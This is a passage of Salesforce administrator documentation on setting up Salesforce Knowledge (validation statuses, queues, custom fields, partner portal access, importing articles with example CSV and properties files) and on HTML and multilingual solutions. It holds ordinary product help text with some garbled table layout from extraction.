with articles they review. These permissions let them access the article in a draft state. Without these permissions, approvers
can reassign but not approve articles.
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• Workflow rules and approval processes apply to the “Draft to Publication” portion of the article publishing cycle. Workflow
rules aren’t available for archiving. Approval processes aren’t available for translation or archiving.

Note:  When an article is published from the edit page, the article is first saved and then published. Workflow
rules apply to the saved draft article but not the published article.

See Also:
Setting Up Salesforce Knowledge

Defining Validation Status Picklist Values
This page enables you to add or edit article validation statuses for article types.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Salesforce Knowledge”

To create or change validation status picklist values:

When the Validation Status field is enabled on the Knowledge Settings page, you can create picklist values that show
the state of the article in the article publication lifecycle. For example, values in the article lifecycle could be Validated,
Not Validated, or Needs Review.

Note: Validation status picklist values aren’t retained when you export articles for translation. Articles with picklist
values can be imported, however, and their values are retained as long as the values exist in your organzation.

1. From Setup, click Customize > Knowledge > Validation Statuses.
2. On the picklist edit page, click New to add new values to the validation status field. You can also edit, delete, reorder, and

replace picklist values.

When you replace a picklist value, the system replaces it in all versions of the article, including any archived versions.

3. Add one or more picklist values (one per line) in the text area.
4. To set the value as the default for the picklist, be sure to select the Default checkbox.
5. Click Save.

See Also:
Managing Articles and Translations
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Creating an Article Queue

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”

AND

“Manage Public List Views”

To create or change queues:

“Customize Application”

AND

“Manage Public List Views”

AND

“Manage Users”

To create or change queues created by other users:

If your organization wants to use queues in approval processes or send articles for translation outside of Salesforce, you need
to create one or more queues. When authors or reviewers submit an article for review or translation, they select the appropriate
queue. For reviews, you can create queues made up of reviewers with different areas of expertise. For translation queues, you
can create one queue for each language or combine languages within queues.

To create an article or translation approval queue, add Knowledge Article Version as the object available to the queue.

See Also:
Exporting Articles for Translation

Custom Field Types on Articles

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To create or change custom fields:

“Manage Salesforce Knowledge”To modify article-types:

The first step in creating a custom field for articles is choosing the field type. This table describes all available custom field
types.
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DescriptionField Type

Allows users to enter a date or pick a date from a popup
calendar. In reports, you can limit the data by specific dates

Date

using any custom date field. You can make this field required
so a user must enter a value before saving an article.

Allows users to enter a date or pick a date from a popup
calendar, and enter a time of day. They can also add the current

Date/Time

date and time by clicking the date and time link next to the
field. The time of day includes AM or PM notation. In
reports, you can limit the data by specific dates and times using
any custom date field. You can make this field required so a
user must enter a value before saving an article.

Allows users to upload and attach a file to an article. Note the
following caveats about File fields:

File

• The maximum attachment size is 5 MB.

• You can add up to 5 File fields to each article type; contact
Salesforce to increase these limits.

• If the Disallow HTML documents and
attachments security setting is enabled, File fields do
not support HTML files.

• Text content in a File field attachment is searchable. You
can search up to 25 MB of attached files on an article. For
example, if an article has six 5 MB file attachments, the
first 4.16 MB of each file is searchable.

• You cannot attach Salesforce CRM Content files using
the File field.

• The File field type is not supported in Developer edition.

• The filename cannot exceed 40 characters.

• You cannot convert a File field type into any other data
type.

Allows users to select a value from a list you define.Picklist

Allows users to select more than one picklist value from a list
you define. These fields display each value separated by a
semicolon.

Picklist (Multi-select)

Allows users to enter any combination of letters, numbers, or
symbols. You can set a maximum length, up to 255 characters.

Text

You can make this field required so a user must enter a value
before saving an article.

Allows users to enter up to 255 characters that display on
separate lines similar to a Description field. You can make

Text Area

this field required so a user must enter a value before saving
an article.
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DescriptionField Type

Allows users to enter up to 32,768 characters that display on
separate lines similar to a Description field. You can set

Text Area (Long)

the length of this field type to a lower limit, if desired. Any
length from 256 to 32,768 characters is allowed. Note that
every time you press Enter within a long text area field, a
linebreak and a return character are added to the text. These
two characters count toward the 32,768 character limit. You
can make this field required so a user must enter a value before
saving an article.

Allows users to enter up to 32,768 characters of
HTML-supported text.

To create a smart link in a Salesforce Knowledge article to
another Salesforce Knowledge article:.

Text Area (Rich)

1. Highlight the content where you’d like to place the link.
2. Select Protocol <other>.
3. Enter the article URL as:

/articles/[language]/[articleType]/[URLName].

For example, an English article in a multiple language
knowledge base, of article type FAQ, with a URL Name
of About-Passwords the article URL, is
/articles/en_US/FAQ/About-Passwords. Add
language only if your Salesforce Knowledge base supports
multiple languages.

Important:  Smart links are based on the channels
they are in. Therefore, you can’t add a URL to
an article in another channel.

When the URL Name of the linked article is changed,
Salesforce Knowledge automatically updates the article’s URL
based on the channel, adds the site prefix for a public
knowledge base, and adds the community name for the
community portal.

Note:

• You can have up to 100 links to different
Salesforce Knowledge articles in one rich text
field.

2276

Customizing Salesforce KnowledgeAdding a Knowledge Base



DescriptionField Type

• When you convert a text area (rich) field to a text
area (long) field, links are displayed as link
reference numbers, not URLs.

See Also:
Adding Custom Fields to Article Types

Enabling Salesforce Knowledge in the Partner Portal

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To set up and update the partner portal:

“Manage Users”To create and edit profiles or manage portal users:

“Read” permission on article type(s) available on the partner
portal

To view Salesforce Knowledge articles:

You can use the partner portal to provide your partners with access to Salesforce Knowledge articles. Portal users can view and
rate articles but cannot create or edit articles.

After you have set up Salesforce Knowledge in your organization and enabled your partner portal, complete the following
steps to enable Salesforce Knowledge in your portals.

1. Update your cloned Partner User profiles:

a. Include the “Read” user permission on article types you want to share with partners.
b. Verify that the tab visibility for the Articles tab is Default On.

2. At the bottom of the partner portal detail page, click Edit Profiles and activate the new profile.
3. Add the Articles tab to each partner portal.
4. Assign the cloned profiles to your partner portal users:

a. To create a new partner portal user, click Manage External User and choose Enable Partner User on the contact detail
page. To update an existing user, click Manage External User and choose View Partner User on the contact detail
page.

b. For a new user, select the cloned profile from the Profile drop-down menu. For an existing user, click Edit  and then
select the profile.

c. Click Save.
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5. If you want your partner portal users to have different category group visibility settings than the account owner, change
the visibility settings for the partner portal user.

By default, partner portal users inherit which categories they can access from the account owner. For example, if the account
owner has a role of CEO and the CEO role has full access to all the data categories in the category group assigned to
Salesforce Knowledge, then partner portal users can also access all categories in the knowledge base. In some cases, you
may want to limit which categories a partner portal user can access.

6. Notify users who create articles that they must select Partner as a channel option when creating or modifying an article.
If the Partner channel is not selected, the article will not appear in the portal.

7. To allow users to search for articles from the Home tab, add the Article Search component to the home page layout. Ensure
that you assign the layout to the partner user profiles.

See Also:
Setting Up Salesforce Knowledge

Importing Articles
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

AND

“Read,” “Create,” “Edit,” and “Delete” on the article type

To import articles:

“Read” on the article typeTo view articles:

“Manage Articles”

AND

“Read” and “Create” on the article type

To create articles:

You can import your existing articles and their translations into Salesforce Knowledge. This importer is for articles and
translations you currently have outside Salesforce Knowledge.

Note:  If you are looking for instructions on importing translated articles that you've sent to a localization vendor,
see Importing Article Translations on page 2234.
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After setting up Salesforce Knowledge, complete the tasks below to import articles:

1. Preparing Articles for Import to Salesforce Knowledge
2. Creating a .csv File for Article Import
3. Specifying Parameters for Article Import
4. Creating a .zip File for Article Import
5. Viewing Salesforce Knowledge Import and Export Status

See Also:
Setting Up Salesforce Knowledge

Preparing Articles for Import to Salesforce Knowledge

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

AND

“Read,” “Create,” “Edit,” and “Delete” on the article type

To import articles:

“Read” on the article typeTo view articles:

“Manage Articles”

AND

“Read” and “Create” on the article type

To create articles:

Important:  You must import articles one article type at a time.

To prepare articles for importing:

1. Sort your existing articles by information type. For example: FAQ, product information, or offer.
2. Ensure that each information type has a corresponding Salesforce Knowledge article type that matches its structure and

content. For example, if you are importing FAQs, ensure that Salesforce Knowledge has an FAQ article type with enough
question and answer fields to accommodate the largest FAQ article.
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Note:  The article importer does not support sub-fields. If you have fields within fields, you’ll need to adjust your
structure and content before importing into Salesforce Knowledge.

3. Verify that the article's field-level security settings allow you to edit the fields.

If your articles contain .html files, use an article type that contains a rich text area field and ensure that the HTML is compliant
with the tags and attributes supported in the rich text area field.

Tip:  Test your import using a small set of articles.

See Also:
Importing Articles
Creating a .csv File for Article Import

Creating a .csv File for Article Import

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

AND

“Read,” “Create,” “Edit,” and “Delete” on the article type

To import articles:

“Read” on the article typeTo view articles:

“Manage Articles”

AND

“Read” and “Create” on the article type

To create articles:

Each .csv file imports articles into one article type and maps the imported articles' content with the article type's fields. For
example, a .csv file might map articles' titles with the standard field Title in an article type, meaning that each article's title
is imported into the Title field.

1. Create one .csv file per article type.

2280

Importing ArticlesAdding a Knowledge Base



.csv files can’t have more than 10,000 rows, including the header row. Therefore, you can have a maximum of 9,999
articles and translations.

•

• .csv file rows can’t exceed 400,000 characters.
• .csv file cells can’t exceed 32 KB.
• Each article in the .csv file can’t have more than 49 translations.

2. In the first row, specify the article type's fields and metadata (such as language data categories or channels). Enter one item
in each column. You can use the following fields and metadata to import content:

• isMasterLanguage—identify the article as a master (1) or translation (0). Required to import articles with translations,
however, it can’t be in a .csv file to import articles without translations. Translations must follow their master articles
so that they are associated with the master article preceding it.

• Title—the article or translation’s title. Required for all imports.
• Standard or custom fields—refer to an article type's standard fields using field names and refer to custom fields using

API names. Leaving a row cell empty may cause your articles to be skipped if the related article-type field is mandatory.
• Rich text area field—use the rich text area custom fields to import .html files or images. Refer to an article type's rich

text area field using its API name.
• File field—use the file custom fields to import any file type (.doc, .pdf, .txt, etc.). Refer to an article type's file field

using its API name.
• To categorize the imported articles, use category groups; refer to a category group using its unique name prefixed with

datacategorygroup. For example, use datacategorygroup.Products to specify the category group Products.
• To specify where the imported articles are available, use the keyword Channels.
• Language—specify the articles' language. Required to import articles with translations. Optional to import articles

without translations. If you don't include this column, the articles will automatically belong to the default knowledge
base language and you can’t import translations along with the master articles.

3. In subsequent rows, specify the articles you want to import. Use one row per article and enter the appropriate information
in each article type field column or metadata column.

• Standard or custom fields—enter the articles' data for each field, except for rich text area fields where you must enter
the relative path to the corresponding .html file in your .zip file.

Note:  The article importer does not support sub-fields. If you have fields within fields, you’ll need to adjust
your structure and content before importing into Salesforce Knowledge.

• Rich text area field—always enter the .html file path relative to the location of the .csv file. Never enter raw text. If the
specified path doesn't exist, the related article isn't imported. Note the following information about importing HTML
and images:

◊ We recommend that you create separate folders for the .html files (for example, /data) and the images (for example,
data/images).

◊ To import images, include the images in an .html file using the <img> tag and src attribute. Ensure that the src
value is a relative path from the .html file to the image folder.

◊ Images must be .png, .gif, or .jpeg files.
◊ Each image file can’t exceed 1 MB.
◊ .html files can’t exceed the maximum size for their field.
◊ If a date doesn't match the date format specified in the property file, the related article isn't imported.
◊ If an .html file references a file that isn't allowed, the related article isn't imported.
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◊ If an .html file references an image that's missing, the related article is imported without the image.

• File field—enter the path relative to the file's location. If the specified path doesn't exist, the related article isn't imported.
Note the following information about importing files:

◊ We recommend that you create a folder for your files (for example, /files).
◊ Each file must not exceed 5 MB.

• Category groups—use category unique names to categorize articles. Use the plus symbol (+) to specify more than one
category. For example, Laptop+Desktop. Note the following information about data category groups:

◊ Leaving the cell row empty causes your article to be set to No Categories.
◊ If you specify a category and its parent (for example, Europe+France) the import process skips the child category

France and keeps the parent category Europe, because application of a parent category implicitly includes the
category's children.

◊ When importing articles with translations and associated data categories, only the master article retains the data
categories. The article translations have no associated data category upon import.

• Channels—specify articles' channels using the keywords:

◊ application for Internal App. If you don't specify a channel, application is the default.
◊ sites for Public Knowledge Base.
◊ csp for Customer.
◊ prm for Partner.

Use the plus (+) symbol to specify more than one channel (for example, application+sites+csp to make an article
available in all channels).

Note:  When importing articles with translations and associated channels, only the master article retains the
channels. The article translations have no associated channels upon import.

The following example .csv files import articles in a Product Offer article type. The first example is for imports of articles
without translations. The second is for imports with translations. The .csv files contain titles, summaries, and descriptions.
They also classify the articles in the category group Products and make them available for specific channels. The
description__c  field is a rich text area and only supports paths to .html files. The summary__c field is a text field and
only supports raw text. The “Best Desktop Computer Deals” article has no summary; the cell is left blank because the
summary__c field is not mandatory.

Channelsdatacategorygroup
.Products

description__csummary__cTitle

application+cspConsumer_ Electronicsdata/freecam.htmlGet the new Digital
Camera.

Free Digital Camera
Offer

application+cspDesktopdata/bestdeals.htmlBest Desktop
Computer Deals

application+cspLaptop+Desktopsdata/freeship.htmlFree Shipping on
Laptop and Desktops
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Example articlesimport.csv file:

Title,summary__c,description__c,datacategorygroup.Products,Channels
Free Digital Camera Offer, Get the new Digital
Camera.,data/freecam.html,Consumer_Electronics,application+csp
Best Desktop Computer Deals,,data/bestdeals.html,Desktop,application+csp
Free Shipping on Laptop and Desktops,,data/freeship.html,Laptop+Desktops,application+csp

LanguageChannelsdatacategorygroup
.Products

description__csummary__cTitleisMaster
Language

en_USapplication
+csp

Consumer_ Electronicsdata/freecam.htmlGet the new Digital
Camera.

Free Digital Camera Offer1

frdata/freecam/fr.htmlObtenir le nouvel Appareil
photo digital.

Libérer l'Offre d'Appareil
photo digital

0

esdata/freecam/es.htmlConsiga la nueva Cámara
Digital.

Liberte Oferta Digital de
Cámara

0

en_USapplication
+csp

Desktopsdata/bestdeals.htmlBest Desktop Computer
Deals

1

frdata/bestdeals/fr.htmlMeilleures Affaires
d'ordinateurs de bureau

0

esdata/bestdeals/es.htmlMejores Tratos de
ordenadores

0

en_USapplication
+csp

Laptops+ Desktopsdata/freeship.htmlFree Shipping on Laptops
and Desktops

1

frdata/freeship/fr.htmlLibérer Affranchissement
sur Portables et
Ordinateurs

0

esdata/freeship/es.htmlLiberte Franqueo en
Laptops y Ordenadores

0

Example articlestranslationsimport.csv file:

isMasterLanguage,Title,summary__c,description__c,datacategorygroup.Products,Channels,Language
1,Free Digital Camera Offer,Get the new Digital
Camera,data/freecam.html,Consumer_Electronics,application+csp,en
0,Libérer l'Offre d'Appareil photo digital,Obtenir le nouvel Appareil photo
digital.,data/freecam/fr.html,,,fr
0,Liberte Oferta Digital de Cámara,Consiga la nueva Cámara Digital.,data/freecam/es.html,,,es
1,Best Desktop Computer Deals,,data/bestdeals.html,Desktops,application+csp,en
0,Meilleures Affaires d'ordinateurs de bureau,,data/bestdeals/fr.html,,,fr
0,Mejores Tratos de ordenadores,,data/bestdeals/es.html,,,es
1,Free Shipping on Laptop and Desktops,,data/freeship.html,Laptops+Desktops,application+csp,en
0,Libérer Affranchissement sur Portables et Ordinateurs,,data/freeship/fr.html,,,fr
0,Liberte Franqueo en Laptops y Ordenadores,,data/freeship/es.html,,,es

See Also:
Importing Articles
Preparing Articles for Import to Salesforce Knowledge
Specifying Parameters for Article Import
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Specifying Parameters for Article Import

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

AND

“Read,” “Create,” “Edit,” and “Delete” on the article type

To import articles:

“Read” on the article typeTo view articles:

“Manage Articles”

AND

“Read” and “Create” on the article type

To create articles:

Specify import parameters in a property file using key names and corresponding values. For example, use the key DateFormat
to specify that a date custom field appears in the DateFormat=dd/MM/YYYY format or specify the character encoding to be
used for the import.

Create a file with the .properties extension and specify the required parameters, as described in this table.

Default ValueDescriptionKey

yyyy-MM-ddFormat of the date to read in the .csv fileDateFormat

yyyy-MM-dd HH:mm:ssFormat of the date and time to read in
the .csv file

DateTimeFormat

ISO8859_15_FDISCharacter encoding used to read the .csv
file

CSVEncoding

,.csv file separatorCSVSeparator

ISO8859_15_FDISDefault encoding used for the HTML
files (if not specified in the charset
attribute from the HTML meta tag).

RTAEncoding

Note: Salesforce does not
support UTF-32 character
encoding. We recommend
using UTF-8. If you use specify
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Default ValueDescriptionKey

UTF-16 character encoding,
ensure your HTML files specify
the right byte-order mark.

Note:  You must specify only Java date formats. Make sure the date format is not misleading. For example, if you
choose the format yyyy-M-d, a date entered as 2011111 can be interpreted as 2011-01-11 or 2011-11-01. Specify at
least :

• Two digits for month and day format (MM, dd)

• Four digits for year format (yyyy)

If a date in the .csv file does not match the date format specified in the property file, the related article is not imported.

Example offerarticlesimport.properties property file:

DateFormat=yyyy-MM-dd
DateTimeFormat=yyyy-MM-dd HH:mm:ss
CSVEncoding=ISO8859_15_FDIS
CSVSeparator=,
RTAEncoding=UTF-8

See Also:
Importing Articles
Creating a .csv File for Article Import
Creating a .zip File for Article Import
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Creating a .zip File for Article Import

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

AND

“Read,” “Create,” “Edit,” and “Delete” on the article type

To import articles:

“Read” on the article typeTo view articles:

“Manage Articles”

AND

“Read” and “Create” on the article type

To create articles:

To complete the import, create a .zip file containing:

• The .csv file.

• The folder containing the .html files to import.

• The folder containing the image files referenced in the .html files.

• The .properties file.

The import .zip file must meet the following requirements:

• There can only be one .csv file and one .properties file.

• The .csv file and the .properties file must be in the root directory.

• The compression process must preserve the folder and subfolder structure.

• The .zip file can’t exceed 10 MB and the uncompressed files can’t exceed 100 MB.

• .csv files can’t have more than 10,000 rows, including the header row. Therefore, you can have a maximum of 9,999 articles
and translations.

• .csv file rows can’t exceed 400,000 characters.

• .csv file cells can’t exceed 32 KB.

• Each article in the .csv file can’t have more than 49 translations.

Upload your .zip file:

1. From Setup, click Data Management > Import Articles.
2. Select the appropriate Article Type for the imported articles.

2286

Importing ArticlesAdding a Knowledge Base



3. Click Browse to select the .zip file, and click OK.
4. If your import contains translations, select the Contains translations? checkbox.

Note:  If this checkbox is selected, your .csv file must contain the isMasterLanguage, Title, and Language columns.
If this checkbox is not selected, your csv file can’t contain the isMasterLanguage column but must contain the
Title column. The Language column is optional for imports of articles without translations.

5. Click Import Now.

When the import is complete you receive an email with an attached log that provides details about the import.

See Also:
Importing Articles
Specifying Parameters for Article Import
Viewing Salesforce Knowledge Import and Export Status

Viewing Salesforce Knowledge Import and Export Status

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Manage Salesforce Knowledge”

AND

“Manage Articles”

AND

“Manage Knowledge Article Import/Export”

AND

“Read,” “Create,” “Edit,” and “Delete” on the article type

To import articles:

“Read” on the article typeTo view articles:

“Manage Articles”

AND

“Read” and “Create” on the article type

To create articles:

To check the status of your imports and exports, from Setup, click Monitoring > Article Imports and Exports. If you've
enabled multiple languages for Salesforce Knowledge, you see two tables: one for article and translation imports and another
for exports for translation.

Import information includes:
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• Possible actions

• .Zip file names

• Who submitted it and when

• Status

• Started and completed dates

• Article types

Export information includes:

• Possible actions

• Zip file names

• Who submitted it and when

• Status

• Started and completed dates

Status descriptions are as follows:

Possible ActionDescriptionStatus

You can click Cancel to cancel the import
or export.

The import or export will start as soon
as the previous pending import or export
completes.

Pending

If you want to stop the process, or if the
process has been stopped, call Salesforce

The import or export is processing.Processing

Support. Salesforce may stop an import
or export if a maintenance task has to be
performed or the import or export exceeds
one hour.

Contact Salesforce Support to restart the
import or export, or click Cancel to
cancel an entry.

Salesforce Support is stopping or has
already stopped the import or export.

Stopping/Stopped

You can restart an import or export, click
Del to delete an entry, or click Email Log

The import or export has been canceled.
The articles that already imported or

Aborted

to receive the completion email and check
the details of your import or export.

exported successfully are available in
Salesforce.

Note that this status doesn't mean the
import or export is successful. Click

The import or export is complete.

Successfully imported articles are visible
on the Article Management tab on the

Completed

Email Log to see the log file attached to
the completion email and check the
details of your import or export.
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Possible ActionDescriptionStatus

Click the exported .zip file name to save
or open the file on your system.

Articles subtab. Successfully imported
translations are visible on the Article
Management tab on the Translations
subtab.

See Also:
Importing Articles

Salesforce Knowledge Implementation Tips
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Consider the following information when planning and implementing Salesforce Knowledge for your organization.

• For detailed implementation instructions, see Setting Up Salesforce Knowledge on page 2212.

• If you want to make articles visible on your website, install the Sample Public Knowledge Base for Salesforce Knowledge app
from the AppExchange.

• Public knowledge base users cannot rate articles.

• The File custom field type allows users to attach documents to articles. Note the following caveats about File fields:

◊ The maximum attachment size is 5 MB.

◊ You can add up to 5 File fields to each article type; contact Salesforce to increase these limits.

◊ If the Disallow HTML documents and attachments security setting is enabled, File fields do not support
HTML files.

◊ Text content in a File field attachment is searchable. You can search up to 25 MB of attached files on an article. For
example, if an article has six 5 MB file attachments, the first 4.16 MB of each file is searchable.

◊ You cannot attach Salesforce CRM Content files using the File field.

◊ The File field type is not supported in Developer edition.

◊ The filename cannot exceed 40 characters.

◊ You cannot convert a File field type into any other data type.

• You will lose your data if you convert a custom field on an article type into any other field type. Do not convert custom
fields unless no data exists for the field.

• The Salesforce Knowledge search engine supports stemming, which is the process of reducing a word to its root form.
With stemming, a search can match expanded forms of a search term. For example, a search for run matches items that
contain run, running, and ran. Stemming is available only for articles are that are marked as being in one of these languages:
Danish, Dutch, English, French, German, Hebrew, Italian, Korean, Norwegian, Portuguese, Romanian, Russian, Spanish,
or Swedish. Additionally, the search must be initiated by a user who is viewing the application in one of these languages.
You can edit the default language for your organization on the Company Information page.

• Make sure that you have a clear understanding of the type of articles your organization will implement, and how users will
need to interact with these article types. This will determine the article type permissions and article actions that you need
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to assign to Salesforce Knowledge users, which you can then use to create the set of profiles or permission sets required by
your organization. For more information, see Granting Permissions for Salesforce Knowledge Users on page 2267.

• Determine if you need to create workflow rules for some of your article types. For example, you can create a rule that sends
an email to an article manager when an agent creates a new article upon closing a case.

• Determine if you need to create approval processes for some of your article types. For example, if you have a type of article
that must have legal and management approval before it can be published externally, you should create an approval process
for the article type.

Consider the following tips if your organization plans to use data categories.

• You can create up to three category groups with a maximum of five hierarchy levels in each group. Each category group
can contain a total of 100 categories.

• If you want to use data categories with Answers, after creating your category group you must assign it from Setup by
clicking Customize > Answers > Data Category Assignments. You can only assign one category group to an answers
community. Salesforce Knowledge supports multiple category groups.

• Even though you can create up to five hierarchy levels of categories in a category group, only the first level of categories is
supported in your answers community. Child categories below the first level are not displayed in the community, and
community members can't assign these child categories to questions. Salesforce Knowledge supports a hierarchy of data
categories.

• Category groups are hidden from users until they are activated. Do not activate a category group until you have finished
defining its categories and their access settings, including their visibility.

• When assigning categories to articles, you can choose up to eight categories in a category group.

• If an article has no categories, it displays only when you choose the No Filter option in the category drop-down menu.

• When searching for articles or article translations, selecting a category automatically includes the parent and children of
that category and any grandparents, up to and including the top level. Sibling categories are not included. For example, if
a category hierarchy has the levels All Products, Switches, Optical Networks, and Metro Core, selecting “Optical Networks”
from the category drop-down menu returns articles assigned to any of the four categories. However, if the Switches category
has a sibling category called Routers, selecting “Optical Networks” does not return articles classified within Routers.
Category visibility settings may limit the specific articles you can find.

• Once visibility settings have been chosen for the categories:

◊ Users who are not assigned visibility can only see uncategorized articles and questions unless default category visibility
has been set up.

◊ For role-based visibility, Customer Portal users and partner portal users inherit the category group visibility settings
assigned to their account managers by default. You can change the category group visibility settings for each portal
role.

◊ If you only have access to one category in a category group, the category drop-down menu for that category group does
not display on the Articles tab.

• Deleting a category:

◊ Permanently removes it. It cannot be restored. It never appears in the Recycle Bin.

◊ Permanently deletes its child categories.

◊ As applicable, removes the category and its children from the Answers tab, the Article Management tab, the Articles
tab in all channels, and your company's public knowledge base.

◊ Removes associations between the category and articles or questions. You can reassign articles and questions to another
category.

◊ Removes its mapping to visibility. Users lose their visibility to articles and answers associated with the deleted category.

• Deleting a category group:
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◊ Moves it to the Deleted Category Groups section, which is a recycle bin. You can view items in this section but not
edit them. It holds category groups for 15 days before they are permanently erased and cannot be recovered. During
the 15–day holding period, you can either restore a category group, or permanently erase it immediately.

◊ Deletes all categories within that group.

◊ Removes all associations between the group's categories and articles or questions.

◊ Removes all associations between the group's categories and visibility.

◊ As applicable, removes the category drop-down menu from the Articles tab in all channels, the Article Management
tab, and your company's public knowledge base.

• You can translate the labels of categories and category groups using the Translation Workbench.

See Also:
Setting Up Salesforce Knowledge

Salesforce Knowledge Best Practices
Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

Consider the following tips when planning and using Salesforce Knowledge:

• Take full advantage of multiple article types as custom containers for your articles. Organizing articles by type helps
differentiate content and allows users greater flexibility when searching for articles.

• Create synonym groups in Salesforce Knowledge. Synonyms are words or phrases that are treated as equivalent in article
searches, letting you optimize search results. For more information see Managing Salesforce Knowledge Synonyms on
page 2228.

• Before setting up data categories, carefully plan your category groups and their hierarchies. Also, consider how your category
hierarchy will map to your role hierarchy. For more information, see About Category Group Visibility on page 2258.

• Create custom reports on your Salesforce Knowledge data. You can also install the Knowledge Base Dashboards and Reports
app from the AppExchange to receive over two dozen helpful reports.

• Multiple users can edit the same article at the same time. If that occurs, your changes may be overwritten by a colleague
without warning, even if you save your work frequently. To avoid accidental data loss, instruct all users who edit articles
to only edit the articles they're assigned.

• Know the maximum limits for articles, article types, and data categories.

• Review your usage regularly to avoid storage shortages: from Setup, click Data Management > Storage Usage.

See Also:
Setting Up Salesforce Knowledge
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ADDING SOLUTIONS

HTML Solutions Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on solutionsTo create solutions:

HTML solutions provide a more flexible way to create solutions, by allowing you to easily format paragraphs, and insert images
and links. Using HTML solutions, you create solutions with an HTML editor and display those solutions to users in Salesforce,
the Self-Service portal, the Customer Portal, and as public solutions.

Using the HTML editor, you can:

• Change fonts

• Increase or decrease font sizes

• Insert images from the Documents tab

• Set text color

• Set the background color of text

• Insert hyperlinks

• Change paragraph alignment

• Create bulleted and numbered lists

Note: By default, solutions are created and displayed in text format. Your administrator must enable HTML solutions.

Before you begin creating HTML solutions for your organization, review the following implementation tips and best practices.

Implementation Tips

• Once you enable HTML solutions, you cannot disable it.
• If you open a text solution with the HTML editor and save it, the solution becomes an HTML solution.
• HTML solutions are presented as such to Self-Service portal, public solutions, Customer Portal, and Salesforce users.
• Any HTML tags entered into the HTML editor will display to users as text when the solution is saved.
• When the HTML solution detail is displayed in list views and search results, only the first 255 characters are displayed.

This number includes HTML tags and images that are removed.
• Each HTML solution can contain up to 32000 characters, including HTML tags.
• HTML formatting is preserved in the printable view of a solution.
• Hyperlinks in HTML solutions open in a new browser window when users click on them.
• All images that you want to include in your HTML solutions must be uploaded to the Documents tab. Images in HTML

solution details will not show up in list views and reports.
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• HTML solutions can be created in any of the languages supported by Salesforce.

Best Practices

The following HTML tags are allowed in HTML solutions imported into Salesforce:

<q><dt><a>

<samp><em><abbr>

<small><font><acronym>

<span><h1><address>

<strike><h2><b>

<strong><h3><bdo>

<sub><h4><big>

<sup><h5><blockquote>

<table><h6><br>

<tbody><hr><caption>

<td><i><cite>

<tfoot><img><code>

<th><ins><col>

<thead><kbd><colgroup>

<tr><li><dd>

<tt><ol><del>

<ul><p><dfn>

<var><pre><div>

<dl>

Within the above tags, you can include the following attributes:

sizefacealt

srcheightbackground

stylehrefborder

targetnameclass

widthrowspancolspan

The above attributes that can include a URL are limited to URLs that begin with the following:

• http:

• https:

• file:
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• ftp:

• mailto:

• #

• / for relative links

See Also:
Categorizing Solutions
Creating Solutions

Multilingual Solutions Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The multilingual solutions feature helps you translate solutions and solution categories into the languages supported by
Salesforce so that customers and support reps can find answers to inquiries in the language with which they are most comfortable.

Multilingual solutions can lower support costs by:

• Improving customer satisfaction by answering inquiries in the languages preferred by customers

• Deflecting unnecessary incoming calls by providing solutions in languages that are the most useful for customers

• Managing inquiries in multiple languages from one location, anytime and anywhere

Review the following key terms for multilingual solutions:

Master Solution

A solution created in any language supported by Salesforce. A master solution can have zero or more translations associated
with it; it cannot be linked to another master solution.

Translated Solution

A solution translated into another language supported by Salesforce and associated with exactly one master solution. A
translated solution cannot have the same language as its master solution or any other translated solutions associated with
that master solution. A translated solution cannot have other translated solutions associated with it. Translated solutions

are represented by the  icon on solution detail pages, solution edit pages, solution list views, and solution search results.

You can work with multilingual solutions from the following:

Solutions Tab

When creating a new solution, users can choose a language in which to write the solution from the Language picklist
field. Once the solution is saved, it becomes a master solution. Users can then create a translated solution by clicking
New on the Translated Solutions related list of the master solution detail page. When a master solution is modified,
users can adjust the statuses of its translated solutions to indicate that they may need translating.

Cases Tab

When users search for relevant solutions on a case by entering keywords in the Solutions related list and clicking Find
Solution, search results include solutions in all languages that have matching keywords. Alternatively, if suggested
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solutions is enabled for cases, users can click View Suggested Solutions to find relevant solutions in multiple languages
if they share common words with the case.

Self-Service Portal

If multilingual solution search is enabled for your Self-Service portal, customers automatically view solution search results
in their preferred language as specified in their Self-Service user information settings. Customers can also choose to view
solution search results in a specific language or all supported languages via a language drop-down list. By default, the
Login Page of your Self-Service portal displays in your organization's language.

Public Solutions

If multilingual solution search is enabled for your public solutions, customers can choose to view solution search results
in a specific language or all supported languages via a language drop-down list. By default, public solutions display in
your organization's language.

Solution Categories

Users with the “Manage Translation” permission can use the translation workbench to translate solution categories so
that they display in the language of each user on the Solutions tab and in the preferred language of each customer on
the Self-Service portal as specified in the customer's user settings. Solution categories are not translated for public
solutions.

Reports

You can track translated solutions marked Out of Date by choosing the Translated Solutions report. Running this
report also lists the title and details of translated solutions. You can also create a custom report for multilingual solutions
using the Master and Translated Solutions report type.

List Views

You can see which translated solutions are marked Out of Date and may need translating by creating a custom list
view on the Solutions tab and entering the following search criteria: “Out of Date equals True”.

Import

